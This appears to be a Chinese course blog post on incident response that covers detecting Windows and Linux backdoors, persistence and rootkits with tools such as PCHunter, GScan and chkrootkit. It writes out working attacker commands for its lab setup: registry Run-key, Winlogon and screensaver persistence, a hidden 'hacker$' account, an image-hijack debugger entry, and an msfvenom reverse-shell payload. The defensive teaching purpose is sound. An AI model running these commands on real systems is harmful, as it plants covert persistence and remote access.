第163天:应急响应-后门攻击检测指南_Rookit_内存马_权限维持_WIN_Linux

目录

[案例一: Windows-后门-常规&权限维持&内存马](#案例一: Windows-后门-常规&权限维持&内存马)

常规后门

权限维持

内存马

案例二:Linux-后门-常规&权限维持&Rootkit

常规

权限维持


案例一: Windows-后门-常规&权限维持&内存马

常规后门

常规msf后门,可以直接通过网络连接查看到

查看端口,就直接可以看到与别的主机建立了连接

利用火绒剑也可以查看连接,一般优先查看未知文件的连接,数字签名文件一般是有证书,如果免杀做的非常好,可以实现这一点

pchunter也可以查看不过不明显

权限维持

开机自启动

复制代码
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\shell.exe"

火绒剑启动项里面查看自启动文件

pchunter里面

创建隐藏账户

复制代码
net user hacker$ hack!@#45 /add

pchunter中可以直接看到

可以直接删除

映像劫持

复制代码
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe /c calc"		#修改注册表

pchunter中

火绒剑

屏幕保护

复制代码
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\shell.exe" /f	#屏保
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\msf.exe"		#远程登陆该计算机 启动shell

火绒启动中未知

pchunter中标为蓝色

内存马

基础检测这篇里面写过

第162天: 应急响应-网站入侵篡改指南&Webshell 内存马查杀&漏洞排查&时间分析-CSDN博客

在此基础之上补充一点,除了之前的那一种内存马,还有三种哥斯拉内存马

像这些写出来的,可以直接删除,而像瞎买按lister这个,就得使用类似headdump工具去进行一个手动分析

案例二:Linux-后门-常规&权限维持&Rootkit

常规

常规后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.172.130 LPORT=7777 -f elf >shell.elf

直接查看端口就可以

权限维持

工具下载地址:https://github.com/grayddq/GScan

设置两个权限维持,一个计时任务,一个alias执行命令,不会的看这篇文章

第145天:内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务-CSDN博客

检测结果

rookit后门是写入了内核当中,用wireshark进行抓包都住不到。目前免费的系统都检测不到。只能是检测程序已经装好了,在监控的过程中发现了流量特征,有可能能够监控到

rookit复现案例:

第145天:内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务-CSDN博客

rookit的检测工具:

Gscan也可以进行扫描
The Rootkit Hunter project
https://www.chkrootkit.org/

相关推荐
常宇杏起31 分钟前
AI安全进阶:AI模型鲁棒性测试的核心方法
大数据·人工智能·安全
木泽八1 小时前
2026年网络安全威胁全景:AI攻防新纪元完全指南
人工智能·安全·web安全
星幻元宇VR1 小时前
VR互动平台|开启沉浸式体验新方式
科技·学习·安全·vr·虚拟现实
云空2 小时前
《Hermes Agent 部署与使用中的安全漏洞分析及解决办法》
网络·人工智能·安全
常宇杏起3 小时前
AI安全进阶:AI模型投毒攻击的检测与防御
大数据·人工智能·安全
哇哦9823 小时前
渗透安全(渗透防御)②
linux·安全·渗透防御
老张的张Z3 小时前
CISSP 域6知识点 安全测试方法
安全·信息安全·cissp
xixixi777774 小时前
从Mythos到GPT-5.4-Cyber:AI安全竞赛的“双轨”分化与防御新范式
网络·gpt·安全·机器学习·架构·大模型·claude
CV-杨帆4 小时前
WWW 2026 大模型安全相关论文整理
安全
信创DevOps先锋5 小时前
国产CI/CD工具深度评测:安全合规时代的DevSecOps新选择
安全·ci/cd